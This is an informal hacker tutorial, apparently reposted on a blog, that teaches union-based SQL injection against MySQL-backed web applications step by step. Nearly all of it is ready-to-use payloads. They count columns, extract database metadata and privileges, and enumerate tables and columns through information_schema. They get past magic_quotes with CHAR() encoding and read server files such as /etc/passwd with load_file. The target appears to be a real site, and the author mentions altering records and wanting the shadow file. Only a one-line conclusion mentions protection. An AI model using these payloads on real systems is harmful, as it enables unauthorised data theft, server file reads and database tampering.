Author : AlpHaNiX
contact : AlpHa[AT]Hacker[DOT]BZ
———————————————–
–= summary =–
0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - HelpFull links
——————————————————
0×001 - Introduction :
SQL Injection is a technique allow you to exploit
a web vulnerablity to extract content of the database
and show it for the injector thanks to an error while the
request ….
——————————————————
0×010 - Global Exploiting :
Exploiting The SQL Injection Vulnerabilty
To Exploit This Vulnerabilty You Got to have the following
conditions :
1- Null the querry
2- Get The Number of columns
-> To null the querry its enough to add something that doesnt
exist in the database
-> To know the number of columns in MySQL you can
use the next command in the querry : ‘+order+by+x–
x is the number of columns you trynna guess :
=> if the page shows normal with no errors this means that
the number you enterd is < than real number of columns
=> if the page show and error this means that
the number you enterd is > than real number of columns
now you are wondering how to know the real number of columns
i’ll tell you , its the number right before 1st error !
Note : Dont forget the comment :
( — or /* or # or a null byte )
i hope its pretty clear
so build the querry like this
=> ‘ union select 1,2,3–
1,2,3 -> number of columns
in our example the number of columns is 19 :
‘+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18–
Note : i'v started count from 0 ,
xx - now lets get basic infos about this database
=> DataBase Name
-> you can get the version of the db with ‘database()’
‘ union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19–
The database is called "fluff2"
=> DataBase Version
-> you can get the version of the db with ‘version()’
‘ union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19–
The database Version is "5"
=> DataBase UserName
-> you can get the version of the db with ‘user()’
‘ union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19–
The database username is "muu"
=> DataBase Location
-> you can get the version of the db with ‘@@datadir’
‘ union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19–
The database is located in "/var/lib/mysql/ "
xxx - Get your privileges !
Let’s Try any priv’s (select,update,file etc…)
‘ union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user–
‘ union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user–
‘ union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user–
it seems that nothing is allowed !
well , since our user is muu lets try to see our priv’s while our user = muu
‘ union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)–
we can see we got full priv’s now 
——————————————————
0×011 - Exploiting The Bug :
let’s try now to get the database content and use it !
=> uploading a file !
to upload any file magic_quotes got to be set ‘OFF’
-> what the fuck is magic_quotes ?
Magic_Quotes is a feature in php Made to help coders
and developers to avoid falling in SQL injections vulnerabilitys
and its going to be removed in PHP6 !
Well , in Our FaceBook Magic_Quotes Are set ‘ON’
we cannout use into outfile to upload a File .!
=> Getting DB content :
to read content of a specific column , you must use the following
‘ union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18,19 from table–
column -> its your wanted column to read
table -> its the table where the wanted column located
Now you wonder , You dont know column names or table names ,
how to do ?
since its V5 The database it got to have information_schema inside
so let’s expoit information_schema :
-> Get Tables :
‘ union select 1,2,3,4,5,6,7,concat(table_name,0×7c,table_schema,0×7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables–
Like you See It’s showing the name of the table | database
but only one table appears ! what to do to show to rest ?
change concat into group_concat ; the xplt like this :
‘ union select 1,2,3,4,5,6,7,group_concat(table_name,0×7c,table_schema,0×7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables–
well its showing some more 
but this is not all
lets try something different !
add after our current explt LIMIT 1 OFFSET 44–
‘ union select 1,2,3,4,5,6,7,concat(table_name,0×7c,table_schema,0×7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44–
and Change the ‘44′ to another number and it will show another table
Now you wonder how to get table columns ?!
Alright , you can get table columns from information_schema.columns like the following
from+information_schema.columns+where+table_name="table_name"
so in our explt it will became like this :
‘ union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where tabe_name=’info ‘–
since Magic_Quotes are setten ‘ON’ we must convert table name to ASCII
‘ union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where tabe_name=CHAR(105, 110, 102, 111)–
Bingo ! this is one column
to show the others use ‘limit 1 offset’
You can see content of any column =)
For Now lets try to look for specific table or specific column !
you can get it using
‘ union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like time–
Note : time is the column wanted to look for
and dont forget to change the column to ASCII cuz magic_quotes on
‘ union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)–
To see other infos of the column concatinate ‘column_name’ with table_schema and table_name
‘ union select 1,2,3,4,5,6,7,concat(column_name,0×7c,table_schema,0×7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)–
Bingo ! You can see column , db , table , and look for any column ,
pretty easy ? isn’t
=> Reading Any File content :
since we have file loading privileges , we can load any file
in the server (must have right permissions) and show it !
‘ union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu–
and convert to ascii
‘ union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)–
here we loaded ‘/etc/passwd’ file , i would like to
get the shadow but i dont have root priv’s xD
=> Updating the database :
since we got update privilege we can change value
of any field in the db !
update querry is like the following :
‘ update table_name set column_name=’new value’ where column_name=’value’ where user=muu
never forget to convert to ascii xD
——————————————————
0×101 - Conclusion :
SQL injections are vulnerable in 60% of scripts , and its realy important
to learn how to protect our selves from it to make more secure scripts
——————————————————
0×110 - Helpfull Links :
——————————————————
Be Safe
./AlpHaNiX
ليست هناك تعليقات:
إرسال تعليق